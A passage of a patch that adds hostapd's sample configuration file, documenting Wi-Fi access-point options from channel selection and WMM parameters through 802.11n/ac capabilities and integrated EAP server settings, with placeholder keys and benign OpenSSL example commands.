++#ssid2=P"hello\nthere" ++ ++# UTF-8 SSID: Whether the SSID is to be interpreted using UTF-8 encoding ++#utf8_ssid=1 ++ ++# Country code (ISO/IEC 3166-1). Used to set regulatory domain. ++# Set as needed to indicate country in which device is operating. ++# This can limit available channels and transmit power. ++#country_code=US ++ ++# Enable IEEE 802.11d. This advertises the country_code and the set of allowed ++# channels and transmit power levels based on the regulatory limits. The ++# country_code setting must be configured with the correct country for ++# IEEE 802.11d functions. ++# (default: 0 = disabled) ++#ieee80211d=1 ++ ++# Enable IEEE 802.11h. This enables radar detection and DFS support if ++# available. DFS support is required on outdoor 5 GHz channels in most countries ++# of the world. This can be used only with ieee80211d=1. ++# (default: 0 = disabled) ++#ieee80211h=1 ++ ++# Add Power Constraint element to Beacon and Probe Response frames ++# This config option adds Power Constraint element when applicable and Country ++# element is added. Power Constraint element is required by Transmit Power ++# Control. This can be used only with ieee80211d=1. ++# Valid values are 0..255. ++#local_pwr_constraint=3 ++ ++# Set Spectrum Management subfield in the Capability Information field. ++# This config option forces the Spectrum Management bit to be set. When this ++# option is not set, the value of the Spectrum Management bit depends on whether ++# DFS or TPC is required by regulatory authorities. This can be used only with ++# ieee80211d=1 and local_pwr_constraint configured. ++#spectrum_mgmt_required=1 ++ ++# Operation mode (a = IEEE 802.11a (5 GHz), b = IEEE 802.11b (2.4 GHz), ++# g = IEEE 802.11g (2.4 GHz), ad = IEEE 802.11ad (60 GHz); a/g options are used ++# with IEEE 802.11n (HT), too, to specify band). For IEEE 802.11ac (VHT), this ++# needs to be set to hw_mode=a. When using ACS (see channel parameter), a ++# special value "any" can be used to indicate that any support band can be used. ++# This special case is currently supported only with drivers with which ++# offloaded ACS is used. ++# Default: IEEE 802.11b ++hw_mode=g ++ ++# Channel number (IEEE 802.11) ++# (default: 0, i.e., not set) ++# Please note that some drivers do not use this value from hostapd and the ++# channel will need to be configured separately with iwconfig. ++# ++# If CONFIG_ACS build option is enabled, the channel can be selected ++# automatically at run time by setting channel=acs_survey or channel=0, both of ++# which will enable the ACS survey based algorithm. ++#channel=1 ++ ++# ACS tuning - Automatic Channel Selection ++# See: http://wireless.kernel.org/en/users/Documentation/acs ++# ++# You can customize the ACS survey algorithm with following variables: ++# ++# acs_num_scans requirement is 1..100 - number of scans to be performed that ++# are used to trigger survey data gathering of an underlying device driver. ++# Scans are passive and typically take a little over 100ms (depending on the ++# driver) on each available channel for given hw_mode. Increasing this value ++# means sacrificing startup time and gathering more data wrt channel ++# interference that may help choosing a better channel. This can also help fine ++# tune the ACS scan time in case a driver has different scan dwell times. ++# ++# acs_chan_bias is a space-separated list of : pairs. It can be ++# used to increase (or decrease) the likelihood of a specific channel to be ++# selected by the ACS algorithm. The total interference factor for each channel ++# gets multiplied by the specified bias value before finding the channel with ++# the lowest value. In other words, values between 0.0 and 1.0 can be used to ++# make a channel more likely to be picked while values larger than 1.0 make the ++# specified channel less likely to be picked. This can be used, e.g., to prefer ++# the commonly used 2.4 GHz band channels 1, 6, and 11 (which is the default ++# behavior on 2.4 GHz band if no acs_chan_bias parameter is specified). ++# ++# Defaults: ++#acs_num_scans=5 ++#acs_chan_bias=1:0.8 6:0.8 11:0.8 ++ ++# Channel list restriction. This option allows hostapd to select one of the ++# provided channels when a channel should be automatically selected. ++# Channel list can be provided as range using hyphen ('-') or individual ++# channels can be specified by space (' ') separated values ++# Default: all channels allowed in selected hw_mode ++#chanlist=100 104 108 112 116 ++#chanlist=1 6 11-13 ++ ++# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535) ++beacon_int=100 ++ ++# DTIM (delivery traffic information message) period (range 1..255): ++# number of beacons between DTIMs (1 = every beacon includes DTIM element) ++# (default: 2) ++dtim_period=2 ++ ++# Maximum number of stations allowed in station table. New stations will be ++# rejected after the station table is full. IEEE 802.11 has a limit of 2007 ++# different association IDs, so this number should not be larger than that. ++# (default: 2007) ++max_num_sta=255 ++ ++# RTS/CTS threshold; -1 = disabled (default); range -1..65535 ++# If this field is not included in hostapd.conf, hostapd will not control ++# RTS threshold and 'iwconfig wlan# rts ' can be used to set it. ++rts_threshold=-1 ++ ++# Fragmentation threshold; -1 = disabled (default); range -1, 256..2346 ++# If this field is not included in hostapd.conf, hostapd will not control ++# fragmentation threshold and 'iwconfig wlan# frag ' can be used to set ++# it. ++fragm_threshold=-1 ++ ++# Rate configuration ++# Default is to enable all rates supported by the hardware. This configuration ++# item allows this list be filtered so that only the listed rates will be left ++# in the list. If the list is empty, all rates are used. This list can have ++# entries that are not in the list of rates the hardware supports (such entries ++# are ignored). The entries in this list are in 100 kbps, i.e., 11 Mbps = 110. ++# If this item is present, at least one rate have to be matching with the rates ++# hardware supports. ++# default: use the most common supported rate setting for the selected ++# hw_mode (i.e., this line can be removed from configuration file in most ++# cases) ++#supported_rates=10 20 55 110 60 90 120 180 240 360 480 540 ++ ++# Basic rate set configuration ++# List of rates (in 100 kbps) that are included in the basic rate set. ++# If this item is not included, usually reasonable default set is used. ++#basic_rates=10 20 ++#basic_rates=10 20 55 110 ++#basic_rates=60 120 240 ++ ++# Short Preamble ++# This parameter can be used to enable optional use of short preamble for ++# frames sent at 2 Mbps, 5.5 Mbps, and 11 Mbps to improve network performance. ++# This applies only to IEEE 802.11b-compatible networks and this should only be ++# enabled if the local hardware supports use of short preamble. If any of the ++# associated STAs do not support short preamble, use of short preamble will be ++# disabled (and enabled when such STAs disassociate) dynamically. ++# 0 = do not allow use of short preamble (default) ++# 1 = allow use of short preamble ++#preamble=1 ++ ++# Station MAC address -based authentication ++# Please note that this kind of access control requires a driver that uses ++# hostapd to take care of management frame processing and as such, this can be ++# used with driver=hostap or driver=nl80211, but not with driver=atheros. ++# 0 = accept unless in deny list ++# 1 = deny unless in accept list ++# 2 = use external RADIUS server (accept/deny lists are searched first) ++macaddr_acl=0 ++ ++# Accept/deny lists are read from separate files (containing list of ++# MAC addresses, one per line). Use absolute path name to make sure that the ++# files can be read on SIGHUP configuration reloads. ++#accept_mac_file=/etc/hostapd.accept ++#deny_mac_file=/etc/hostapd.deny ++ ++# IEEE 802.11 specifies two authentication algorithms. hostapd can be ++# configured to allow both of these or only one. Open system authentication ++# should be used with IEEE 802.1X. ++# Bit fields of allowed authentication algorithms: ++# bit 0 = Open System Authentication ++# bit 1 = Shared Key Authentication (requires WEP) ++auth_algs=3 ++ ++# Send empty SSID in beacons and ignore probe request frames that do not ++# specify full SSID, i.e., require stations to know SSID. ++# default: disabled (0) ++# 1 = send empty (length=0) SSID in beacon and ignore probe request for ++# broadcast SSID ++# 2 = clear SSID (ASCII 0), but keep the original length (this may be required ++# with some clients that do not support empty SSID) and ignore probe ++# requests for broadcast SSID ++ignore_broadcast_ssid=0 ++ ++# Do not reply to broadcast Probe Request frames from unassociated STA if there ++# is no room for additional stations (max_num_sta). This can be used to ++# discourage a STA from trying to associate with this AP if the association ++# would be rejected due to maximum STA limit. ++# Default: 0 (disabled) ++#no_probe_resp_if_max_sta=0 ++ ++# Additional vendor specific elements for Beacon and Probe Response frames ++# This parameter can be used to add additional vendor specific element(s) into ++# the end of the Beacon and Probe Response frames. The format for these ++# element(s) is a hexdump of the raw information elements (id+len+payload for ++# one or more elements) ++#vendor_elements=dd0411223301 ++ ++# Additional vendor specific elements for (Re)Association Response frames ++# This parameter can be used to add additional vendor specific element(s) into ++# the end of the (Re)Association Response frames. The format for these ++# element(s) is a hexdump of the raw information elements (id+len+payload for ++# one or more elements) ++#assocresp_elements=dd0411223301 ++ ++# TX queue parameters (EDCF / bursting) ++# tx_queue__ ++# queues: data0, data1, data2, data3, after_beacon, beacon ++# (data0 is the highest priority queue) ++# parameters: ++# aifs: AIFS (default 2) ++# cwmin: cwMin (1, 3, 7, 15, 31, 63, 127, 255, 511, 1023, 2047, 4095, 8191, ++# 16383, 32767) ++# cwmax: cwMax (same values as cwMin, cwMax >= cwMin) ++# burst: maximum length (in milliseconds with precision of up to 0.1 ms) for ++# bursting ++# ++# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): ++# These parameters are used by the access point when transmitting frames ++# to the clients. ++# ++# Low priority / AC_BK = background ++#tx_queue_data3_aifs=7 ++#tx_queue_data3_cwmin=15 ++#tx_queue_data3_cwmax=1023 ++#tx_queue_data3_burst=0 ++# Note: for IEEE 802.11b mode: cWmin=31 cWmax=1023 burst=0 ++# ++# Normal priority / AC_BE = best effort ++#tx_queue_data2_aifs=3 ++#tx_queue_data2_cwmin=15 ++#tx_queue_data2_cwmax=63 ++#tx_queue_data2_burst=0 ++# Note: for IEEE 802.11b mode: cWmin=31 cWmax=127 burst=0 ++# ++# High priority / AC_VI = video ++#tx_queue_data1_aifs=1 ++#tx_queue_data1_cwmin=7 ++#tx_queue_data1_cwmax=15 ++#tx_queue_data1_burst=3.0 ++# Note: for IEEE 802.11b mode: cWmin=15 cWmax=31 burst=6.0 ++# ++# Highest priority / AC_VO = voice ++#tx_queue_data0_aifs=1 ++#tx_queue_data0_cwmin=3 ++#tx_queue_data0_cwmax=7 ++#tx_queue_data0_burst=1.5 ++# Note: for IEEE 802.11b mode: cWmin=7 cWmax=15 burst=3.3 ++ ++# 802.1D Tag (= UP) to AC mappings ++# WMM specifies following mapping of data frames to different ACs. This mapping ++# can be configured using Linux QoS/tc and sch_pktpri.o module. ++# 802.1D Tag 802.1D Designation Access Category WMM Designation ++# 1 BK AC_BK Background ++# 2 - AC_BK Background ++# 0 BE AC_BE Best Effort ++# 3 EE AC_BE Best Effort ++# 4 CL AC_VI Video ++# 5 VI AC_VI Video ++# 6 VO AC_VO Voice ++# 7 NC AC_VO Voice ++# Data frames with no priority information: AC_BE ++# Management frames: AC_VO ++# PS-Poll frames: AC_BE ++ ++# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): ++# for 802.11a or 802.11g networks ++# These parameters are sent to WMM clients when they associate. ++# The parameters will be used by WMM clients for frames transmitted to the ++# access point. ++# ++# note - txop_limit is in units of 32microseconds ++# note - acm is admission control mandatory flag. 0 = admission control not ++# required, 1 = mandatory ++# note - Here cwMin and cmMax are in exponent form. The actual cw value used ++# will be (2^n)-1 where n is the value given here. The allowed range for these ++# wmm_ac_??_{cwmin,cwmax} is 0..15 with cwmax >= cwmin. ++# ++wmm_enabled=1 ++# ++# WMM-PS Unscheduled Automatic Power Save Delivery [U-APSD] ++# Enable this flag if U-APSD supported outside hostapd (eg., Firmware/driver) ++#uapsd_advertisement_enabled=1 ++# ++# Low priority / AC_BK = background ++wmm_ac_bk_cwmin=4 ++wmm_ac_bk_cwmax=10 ++wmm_ac_bk_aifs=7 ++wmm_ac_bk_txop_limit=0 ++wmm_ac_bk_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=5 cWmax=10 ++# ++# Normal priority / AC_BE = best effort ++wmm_ac_be_aifs=3 ++wmm_ac_be_cwmin=4 ++wmm_ac_be_cwmax=10 ++wmm_ac_be_txop_limit=0 ++wmm_ac_be_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=5 cWmax=7 ++# ++# High priority / AC_VI = video ++wmm_ac_vi_aifs=2 ++wmm_ac_vi_cwmin=3 ++wmm_ac_vi_cwmax=4 ++wmm_ac_vi_txop_limit=94 ++wmm_ac_vi_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=4 cWmax=5 txop_limit=188 ++# ++# Highest priority / AC_VO = voice ++wmm_ac_vo_aifs=2 ++wmm_ac_vo_cwmin=2 ++wmm_ac_vo_cwmax=3 ++wmm_ac_vo_txop_limit=47 ++wmm_ac_vo_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=3 cWmax=4 burst=102 ++ ++# Static WEP key configuration ++# ++# The key number to use when transmitting. ++# It must be between 0 and 3, and the corresponding key must be set. ++# default: not set ++#wep_default_key=0 ++# The WEP keys to use. ++# A key may be a quoted string or unquoted hexadecimal digits. ++# The key length should be 5, 13, or 16 characters, or 10, 26, or 32 ++# digits, depending on whether 40-bit (64-bit), 104-bit (128-bit), or ++# 128-bit (152-bit) WEP is used. ++# Only the default key must be supplied; the others are optional. ++# default: not set ++#wep_key0=123456789a ++#wep_key1="vwxyz" ++#wep_key2=0102030405060708090a0b0c0d ++#wep_key3=".2.4.6.8.0.23" ++ ++# Station inactivity limit ++# ++# If a station does not send anything in ap_max_inactivity seconds, an ++# empty data frame is sent to it in order to verify whether it is ++# still in range. If this frame is not ACKed, the station will be ++# disassociated and then deauthenticated. This feature is used to ++# clear station table of old entries when the STAs move out of the ++# range. ++# ++# The station can associate again with the AP if it is still in range; ++# this inactivity poll is just used as a nicer way of verifying ++# inactivity; i.e., client will not report broken connection because ++# disassociation frame is not sent immediately without first polling ++# the STA with a data frame. ++# default: 300 (i.e., 5 minutes) ++#ap_max_inactivity=300 ++# ++# The inactivity polling can be disabled to disconnect stations based on ++# inactivity timeout so that idle stations are more likely to be disconnected ++# even if they are still in range of the AP. This can be done by setting ++# skip_inactivity_poll to 1 (default 0). ++#skip_inactivity_poll=0 ++ ++# Disassociate stations based on excessive transmission failures or other ++# indications of connection loss. This depends on the driver capabilities and ++# may not be available with all drivers. ++#disassoc_low_ack=1 ++ ++# Maximum allowed Listen Interval (how many Beacon periods STAs are allowed to ++# remain asleep). Default: 65535 (no limit apart from field size) ++#max_listen_interval=100 ++ ++# WDS (4-address frame) mode with per-station virtual interfaces ++# (only supported with driver=nl80211) ++# This mode allows associated stations to use 4-address frames to allow layer 2 ++# bridging to be used. ++#wds_sta=1 ++ ++# If bridge parameter is set, the WDS STA interface will be added to the same ++# bridge by default. This can be overridden with the wds_bridge parameter to ++# use a separate bridge. ++#wds_bridge=wds-br0 ++ ++# Start the AP with beaconing disabled by default. ++#start_disabled=0 ++ ++# Client isolation can be used to prevent low-level bridging of frames between ++# associated stations in the BSS. By default, this bridging is allowed. ++#ap_isolate=1 ++ ++# BSS Load update period (in BUs) ++# This field is used to enable and configure adding a BSS Load element into ++# Beacon and Probe Response frames. ++#bss_load_update_period=50 ++ ++# Fixed BSS Load value for testing purposes ++# This field can be used to configure hostapd to add a fixed BSS Load element ++# into Beacon and Probe Response frames for testing purposes. The format is ++# :: ++#bss_load_test=12:80:20000 ++ ++##### IEEE 802.11n related configuration ###################################### ++ ++# ieee80211n: Whether IEEE 802.11n (HT) is enabled ++# 0 = disabled (default) ++# 1 = enabled ++# Note: You will also need to enable WMM for full HT functionality. ++# Note: hw_mode=g (2.4 GHz) and hw_mode=a (5 GHz) is used to specify the band. ++#ieee80211n=1 ++ ++# ht_capab: HT capabilities (list of flags) ++# LDPC coding capability: [LDPC] = supported ++# Supported channel width set: [HT40-] = both 20 MHz and 40 MHz with secondary ++# channel below the primary channel; [HT40+] = both 20 MHz and 40 MHz ++# with secondary channel above the primary channel ++# (20 MHz only if neither is set) ++# Note: There are limits on which channels can be used with HT40- and ++# HT40+. Following table shows the channels that may be available for ++# HT40- and HT40+ use per IEEE 802.11n Annex J: ++# freq HT40- HT40+ ++# 2.4 GHz 5-13 1-7 (1-9 in Europe/Japan) ++# 5 GHz 40,48,56,64 36,44,52,60 ++# (depending on the location, not all of these channels may be available ++# for use) ++# Please note that 40 MHz channels may switch their primary and secondary ++# channels if needed or creation of 40 MHz channel maybe rejected based ++# on overlapping BSSes. These changes are done automatically when hostapd ++# is setting up the 40 MHz channel. ++# Spatial Multiplexing (SM) Power Save: [SMPS-STATIC] or [SMPS-DYNAMIC] ++# (SMPS disabled if neither is set) ++# HT-greenfield: [GF] (disabled if not set) ++# Short GI for 20 MHz: [SHORT-GI-20] (disabled if not set) ++# Short GI for 40 MHz: [SHORT-GI-40] (disabled if not set) ++# Tx STBC: [TX-STBC] (disabled if not set) ++# Rx STBC: [RX-STBC1] (one spatial stream), [RX-STBC12] (one or two spatial ++# streams), or [RX-STBC123] (one, two, or three spatial streams); Rx STBC ++# disabled if none of these set ++# HT-delayed Block Ack: [DELAYED-BA] (disabled if not set) ++# Maximum A-MSDU length: [MAX-AMSDU-7935] for 7935 octets (3839 octets if not ++# set) ++# DSSS/CCK Mode in 40 MHz: [DSSS_CCK-40] = allowed (not allowed if not set) ++# 40 MHz intolerant [40-INTOLERANT] (not advertised if not set) ++# L-SIG TXOP protection support: [LSIG-TXOP-PROT] (disabled if not set) ++#ht_capab=[HT40-][SHORT-GI-20][SHORT-GI-40] ++ ++# Require stations to support HT PHY (reject association if they do not) ++#require_ht=1 ++ ++# If set non-zero, require stations to perform scans of overlapping ++# channels to test for stations which would be affected by 40 MHz traffic. ++# This parameter sets the interval in seconds between these scans. Setting this ++# to non-zero allows 2.4 GHz band AP to move dynamically to a 40 MHz channel if ++# no co-existence issues with neighboring devices are found. ++#obss_interval=0 ++ ++##### IEEE 802.11ac related configuration ##################################### ++ ++# ieee80211ac: Whether IEEE 802.11ac (VHT) is enabled ++# 0 = disabled (default) ++# 1 = enabled ++# Note: You will also need to enable WMM for full VHT functionality. ++# Note: hw_mode=a is used to specify that 5 GHz band is used with VHT. ++#ieee80211ac=1 ++ ++# vht_capab: VHT capabilities (list of flags) ++# ++# vht_max_mpdu_len: [MAX-MPDU-7991] [MAX-MPDU-11454] ++# Indicates maximum MPDU length ++# 0 = 3895 octets (default) ++# 1 = 7991 octets ++# 2 = 11454 octets ++# 3 = reserved ++# ++# supported_chan_width: [VHT160] [VHT160-80PLUS80] ++# Indicates supported Channel widths ++# 0 = 160 MHz & 80+80 channel widths are not supported (default) ++# 1 = 160 MHz channel width is supported ++# 2 = 160 MHz & 80+80 channel widths are supported ++# 3 = reserved ++# ++# Rx LDPC coding capability: [RXLDPC] ++# Indicates support for receiving LDPC coded pkts ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Short GI for 80 MHz: [SHORT-GI-80] ++# Indicates short GI support for reception of packets transmitted with TXVECTOR ++# params format equal to VHT and CBW = 80Mhz ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Short GI for 160 MHz: [SHORT-GI-160] ++# Indicates short GI support for reception of packets transmitted with TXVECTOR ++# params format equal to VHT and CBW = 160Mhz ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Tx STBC: [TX-STBC-2BY1] ++# Indicates support for the transmission of at least 2x1 STBC ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Rx STBC: [RX-STBC-1] [RX-STBC-12] [RX-STBC-123] [RX-STBC-1234] ++# Indicates support for the reception of PPDUs using STBC ++# 0 = Not supported (default) ++# 1 = support of one spatial stream ++# 2 = support of one and two spatial streams ++# 3 = support of one, two and three spatial streams ++# 4 = support of one, two, three and four spatial streams ++# 5,6,7 = reserved ++# ++# SU Beamformer Capable: [SU-BEAMFORMER] ++# Indicates support for operation as a single user beamformer ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# SU Beamformee Capable: [SU-BEAMFORMEE] ++# Indicates support for operation as a single user beamformee ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Compressed Steering Number of Beamformer Antennas Supported: ++# [BF-ANTENNA-2] [BF-ANTENNA-3] [BF-ANTENNA-4] ++# Beamformee's capability indicating the maximum number of beamformer ++# antennas the beamformee can support when sending compressed beamforming ++# feedback ++# If SU beamformer capable, set to maximum value minus 1 ++# else reserved (default) ++# ++# Number of Sounding Dimensions: ++# [SOUNDING-DIMENSION-2] [SOUNDING-DIMENSION-3] [SOUNDING-DIMENSION-4] ++# Beamformer's capability indicating the maximum value of the NUM_STS parameter ++# in the TXVECTOR of a VHT NDP ++# If SU beamformer capable, set to maximum value minus 1 ++# else reserved (default) ++# ++# MU Beamformer Capable: [MU-BEAMFORMER] ++# Indicates support for operation as an MU beamformer ++# 0 = Not supported or sent by Non-AP STA (default) ++# 1 = Supported ++# ++# VHT TXOP PS: [VHT-TXOP-PS] ++# Indicates whether or not the AP supports VHT TXOP Power Save Mode ++# or whether or not the STA is in VHT TXOP Power Save mode ++# 0 = VHT AP doesn't support VHT TXOP PS mode (OR) VHT STA not in VHT TXOP PS ++# mode ++# 1 = VHT AP supports VHT TXOP PS mode (OR) VHT STA is in VHT TXOP power save ++# mode ++# ++# +HTC-VHT Capable: [HTC-VHT] ++# Indicates whether or not the STA supports receiving a VHT variant HT Control ++# field. ++# 0 = Not supported (default) ++# 1 = supported ++# ++# Maximum A-MPDU Length Exponent: [MAX-A-MPDU-LEN-EXP0]..[MAX-A-MPDU-LEN-EXP7] ++# Indicates the maximum length of A-MPDU pre-EOF padding that the STA can recv ++# This field is an integer in the range of 0 to 7. ++# The length defined by this field is equal to ++# 2 pow(13 + Maximum A-MPDU Length Exponent) -1 octets ++# ++# VHT Link Adaptation Capable: [VHT-LINK-ADAPT2] [VHT-LINK-ADAPT3] ++# Indicates whether or not the STA supports link adaptation using VHT variant ++# HT Control field ++# If +HTC-VHTcapable is 1 ++# 0 = (no feedback) if the STA does not provide VHT MFB (default) ++# 1 = reserved ++# 2 = (Unsolicited) if the STA provides only unsolicited VHT MFB ++# 3 = (Both) if the STA can provide VHT MFB in response to VHT MRQ and if the ++# STA provides unsolicited VHT MFB ++# Reserved if +HTC-VHTcapable is 0 ++# ++# Rx Antenna Pattern Consistency: [RX-ANTENNA-PATTERN] ++# Indicates the possibility of Rx antenna pattern change ++# 0 = Rx antenna pattern might change during the lifetime of an association ++# 1 = Rx antenna pattern does not change during the lifetime of an association ++# ++# Tx Antenna Pattern Consistency: [TX-ANTENNA-PATTERN] ++# Indicates the possibility of Tx antenna pattern change ++# 0 = Tx antenna pattern might change during the lifetime of an association ++# 1 = Tx antenna pattern does not change during the lifetime of an association ++#vht_capab=[SHORT-GI-80][HTC-VHT] ++# ++# Require stations to support VHT PHY (reject association if they do not) ++#require_vht=1 ++ ++# 0 = 20 or 40 MHz operating Channel width ++# 1 = 80 MHz channel width ++# 2 = 160 MHz channel width ++# 3 = 80+80 MHz channel width ++#vht_oper_chwidth=1 ++# ++# center freq = 5 GHz + (5 * index) ++# So index 42 gives center freq 5.210 GHz ++# which is channel 42 in 5G band ++# ++#vht_oper_centr_freq_seg0_idx=42 ++# ++# center freq = 5 GHz + (5 * index) ++# So index 159 gives center freq 5.795 GHz ++# which is channel 159 in 5G band ++# ++#vht_oper_centr_freq_seg1_idx=159 ++ ++# Workaround to use station's nsts capability in (Re)Association Response frame ++# This may be needed with some deployed devices as an interoperability ++# workaround for beamforming if the AP's capability is greater than the ++# station's capability. This is disabled by default and can be enabled by ++# setting use_sta_nsts=1. ++#use_sta_nsts=0 ++ ++##### IEEE 802.1X-2004 related configuration ################################## ++ ++# Require IEEE 802.1X authorization ++#ieee8021x=1 ++ ++# IEEE 802.1X/EAPOL version ++# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL ++# version 2. However, there are many client implementations that do not handle ++# the new version number correctly (they seem to drop the frames completely). ++# In order to make hostapd interoperate with these clients, the version number ++# can be set to the older version (1) with this configuration value. ++#eapol_version=2 ++ ++# Optional displayable message sent with EAP Request-Identity. The first \0 ++# in this string will be converted to ASCII-0 (nul). This can be used to ++# separate network info (comma separated list of attribute=value pairs); see, ++# e.g., RFC 4284. ++#eap_message=hello ++#eap_message=hello\0networkid=netw,nasid=foo,portid=0,NAIRealms=example.com ++ ++# WEP rekeying (disabled if key lengths are not set or are set to 0) ++# Key lengths for default/broadcast and individual/unicast keys: ++# 5 = 40-bit WEP (also known as 64-bit WEP with 40 secret bits) ++# 13 = 104-bit WEP (also known as 128-bit WEP with 104 secret bits) ++#wep_key_len_broadcast=5 ++#wep_key_len_unicast=5 ++# Rekeying period in seconds. 0 = do not rekey (i.e., set keys only once) ++#wep_rekey_period=300 ++ ++# EAPOL-Key index workaround (set bit7) for WinXP Supplicant (needed only if ++# only broadcast keys are used) ++eapol_key_index_workaround=0 ++ ++# EAP reauthentication period in seconds (default: 3600 seconds; 0 = disable ++# reauthentication). ++#eap_reauth_period=3600 ++ ++# Use PAE group address (01:80:c2:00:00:03) instead of individual target ++# address when sending EAPOL frames with driver=wired. This is the most common ++# mechanism used in wired authentication, but it also requires that the port ++# is only used by one station. ++#use_pae_group_addr=1 ++ ++# EAP Re-authentication Protocol (ERP) authenticator (RFC 6696) ++# ++# Whether to initiate EAP authentication with EAP-Initiate/Re-auth-Start before ++# EAP-Identity/Request ++#erp_send_reauth_start=1 ++# ++# Domain name for EAP-Initiate/Re-auth-Start. Omitted from the message if not ++# set (no local ER server). This is also used by the integrated EAP server if ++# ERP is enabled (eap_server_erp=1). ++#erp_domain=example.com ++ ++##### Integrated EAP server ################################################### ++ ++# Optionally, hostapd can be configured to use an integrated EAP server ++# to process EAP authentication locally without need for an external RADIUS ++# server. This functionality can be used both as a local authentication server ++# for IEEE 802.1X/EAPOL and as a RADIUS server for other devices. ++ ++# Use integrated EAP server instead of external RADIUS authentication ++# server. This is also needed if hostapd is configured to act as a RADIUS ++# authentication server. ++#eap_server=0 ++ ++# Path for EAP server user database ++# If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db" ++# to use SQLite database instead of a text file. ++#eap_user_file=/etc/hostapd.eap_user ++ ++# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS ++#ca_cert=/etc/hostapd.ca.pem ++ ++# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS ++#server_cert=/etc/hostapd.server.pem ++ ++# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS ++# This may point to the same file as server_cert if both certificate and key ++# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be ++# used by commenting out server_cert and specifying the PFX file as the ++# private_key. ++#private_key=/etc/hostapd.server.prv ++ ++# Passphrase for private key ++#private_key_passwd=secret passphrase ++ ++# Server identity ++# EAP methods that provide mechanism for authenticated server identity delivery ++# use this value. If not set, "hostapd" is used as a default. ++#server_id=server.example.com ++ ++# Enable CRL verification. ++# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a ++# valid CRL signed by the CA is required to be included in the ca_cert file. ++# This can be done by using PEM format for CA certificate and CRL and ++# concatenating these into one file. Whenever CRL changes, hostapd needs to be ++# restarted to take the new CRL into use. ++# 0 = do not verify CRLs (default) ++# 1 = check the CRL of the user certificate ++# 2 = check all CRLs in the certificate path ++#check_crl=1 ++ ++# TLS Session Lifetime in seconds ++# This can be used to allow TLS sessions to be cached and resumed with an ++# abbreviated handshake when using EAP-TLS/TTLS/PEAP. ++# (default: 0 = session caching and resumption disabled) ++#tls_session_lifetime=3600 ++ ++# Cached OCSP stapling response (DER encoded) ++# If set, this file is sent as a certificate status response by the EAP server ++# if the EAP peer requests certificate status in the ClientHello message. ++# This cache file can be updated, e.g., by running following command ++# periodically to get an update from the OCSP responder: ++# openssl ocsp \ ++# -no_nonce \ ++# -CAfile /etc/hostapd.ca.pem \ ++# -issuer /etc/hostapd.ca.pem \ ++# -cert /etc/hostapd.server.pem \ ++# -url http://ocsp.example.com:8888/ \ ++# -respout /tmp/ocsp-cache.der ++#ocsp_stapling_response=/tmp/ocsp-cache.der ++ ++# Cached OCSP stapling response list (DER encoded OCSPResponseList) ++# This is similar to ocsp_stapling_response, but the extended version defined in ++# RFC 6961 to allow multiple OCSP responses to be provided. ++#ocsp_stapling_response_multi=/tmp/ocsp-multi-cache.der ++ ++# dh_file: File path to DH/DSA parameters file (in PEM format) ++# This is an optional configuration file for setting parameters for an ++# ephemeral DH key exchange. In most cases, the default RSA authentication does ++# not use this configuration. However, it is possible setup RSA to use ++# ephemeral DH key exchange. In addition, ciphers with DSA keys always use ++# ephemeral DH keys. This can be used to achieve forward secrecy. If the file ++# is in DSA parameters format, it will be automatically converted into DH ++# params. This parameter is required if anonymous EAP-FAST is used. ++# You can generate DH parameters file with OpenSSL, e.g., ++# "openssl dhparam -out /etc/hostapd.dh.pem 2048" ++#dh_file=/etc/hostapd.dh.pem ++ ++# OpenSSL cipher string ++# ++# This is an OpenSSL specific configuration option for configuring the default ++# ciphers. If not set, "DEFAULT:!EXP:!LOW" is used as the default. ++# See https://www.openssl.org/docs/apps/ciphers.html for OpenSSL documentation ++# on cipher suite configuration. This is applicable only if hostapd is built to ++# use OpenSSL. ++#openssl_ciphers=DEFAULT:!EXP:!LOW ++ ++# Fragment size for EAP methods ++#fragment_size=1400 ++ ++# Finite cyclic group for EAP-pwd. Number maps to group of domain parameters ++# using the IANA repository for IKE (RFC 2409). ++#pwd_group=19 ++ ++# Configuration data for EAP-SIM database/authentication gateway interface. ++# This is a text string in implementation specific format. The example ++# implementation in eap_sim_db.c uses this as the UNIX domain socket name for ++# the HLR/AuC gateway (e.g., hlr_auc_gw). In this case, the path uses "unix:" ++# prefix. If hostapd is built with SQLite support (CONFIG_SQLITE=y in .config), ++# database file can be described with an optional db= parameter. ++#eap_sim_db=unix:/tmp/hlr_auc_gw.sock ++#eap_sim_db=unix:/tmp/hlr_auc_gw.sock db=/tmp/hostapd.db ++ ++# EAP-SIM DB request timeout ++# This parameter sets the maximum time to wait for a database request response. ++# The parameter value is in seconds. ++#eap_sim_db_timeout=1 ++ ++# Encryption key for EAP-FAST PAC-Opaque values. This key must be a secret, ++# random value. It is configured as a 16-octet value in hex format. It can be ++# generated, e.g., with the following command: ++# od -tx1 -v -N16 /dev/random | colrm 1 8 | tr -d ' ' ++#pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f ++ ++# EAP-FAST authority identity (A-ID) ++# A-ID indicates the identity of the authority that issues PACs. The A-ID ++# should be unique across all issuing servers. In theory, this is a variable ++# length field, but due to some existing implementations requiring A-ID to be ++# 16 octets in length, it is strongly recommended to use that length for the ++# field to provid interoperability with deployed peer implementations. This ++# field is configured in hex format. ++#eap_fast_a_id=101112131415161718191a1b1c1d1e1f ++ ++# EAP-FAST authority identifier information (A-ID-Info) ++# This is a user-friendly name for the A-ID. For example, the enterprise name ++# and server name in a human-readable format. This field is encoded as UTF-8. ++#eap_fast_a_id_info=test server 